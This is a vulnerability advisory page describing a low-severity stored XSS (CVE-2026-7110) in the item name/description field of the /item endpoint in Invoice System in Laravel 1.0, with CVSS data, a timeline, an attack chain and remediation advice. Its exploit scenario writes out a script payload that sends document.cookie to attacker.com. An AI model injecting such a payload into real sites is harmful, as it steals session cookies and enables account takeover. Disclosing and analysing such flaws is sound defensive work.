Skip to main content

Invoice System in Laravel EUVD-2026-25811

| CVE-2026-7110 LOW
Cross-site Scripting (XSS) (CWE-79)
2026-04-27 VulDB
XSS Invoice System In Laravel
2.0
CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
2.0 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

9
Severity Changed
Apr 29, 2026 - 01:12 NVD
MEDIUM LOW
CVSS changed
Apr 29, 2026 - 01:12 NVD
5.1 (MEDIUM) 2.0 (LOW)
PoC Detected
Apr 29, 2026 - 01:00 vuln.today
Public exploit code
Analysis Generated
Apr 27, 2026 - 10:30 vuln.today
Severity Changed
Apr 27, 2026 - 10:22 NVD
LOW MEDIUM
CVSS changed
Apr 27, 2026 - 10:22 NVD
3.5 (LOW) 5.1 (MEDIUM)
EUVD ID Assigned
Apr 27, 2026 - 10:00 euvd
EUVD-2026-25811
Analysis Generated
Apr 27, 2026 - 10:00 vuln.today
CVE Published
Apr 27, 2026 - 09:30 nvd
LOW 2.0

DescriptionCVE.org

A flaw has been found in code-projects Invoice System in Laravel 1.0. Affected is an unknown function of the file /item. Executing a manipulation of the argument item name/description can lead to cross site scripting. It is possible to launch the attack remotely. The exploit has been published and may be used.

AnalysisAI

Cross-site scripting (XSS) in code-projects Invoice System in Laravel 1.0 allows authenticated remote attackers to inject malicious scripts via the item name/description parameter in the /item endpoint. The vulnerability requires user interaction (UI:P) and affects only the integrity of victim data (VI:L), but publicly available exploit code exists and the attack vector is network-accessible.

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Authenticate as user
Delivery
Navigate to /item endpoint
Exploit
Inject XSS payload in name/description field
Install
Submit form
C2
Victim views item
Execute
Malicious script executes in victim browser
Impact
Session cookie/data exfiltrated
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires: (1) valid authentication credentials to access the Invoice System in Laravel application; (2) the ability to create or modify an invoice item with a crafted name/description parameter containing XSS payload; (3) a victim user with higher or equal privileges to view the poisoned item, triggering the reflected/stored XSS in their browser. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment This is a moderate-risk XSS vulnerability with several limiting factors. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An authenticated user (attacker with system access) navigates to the /item creation or editing page and injects a malicious JavaScript payload such as <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> into the item name field. When a victim user subsequently views the item (e.g., in an invoice dashboard or item list), the script executes in their browser context, stealing their session cookie and enabling account takeover or further lateral movement. …
Remediation Immediate action: Apply proper output encoding to all user-controlled input rendered in the /item endpoint. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-25811 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy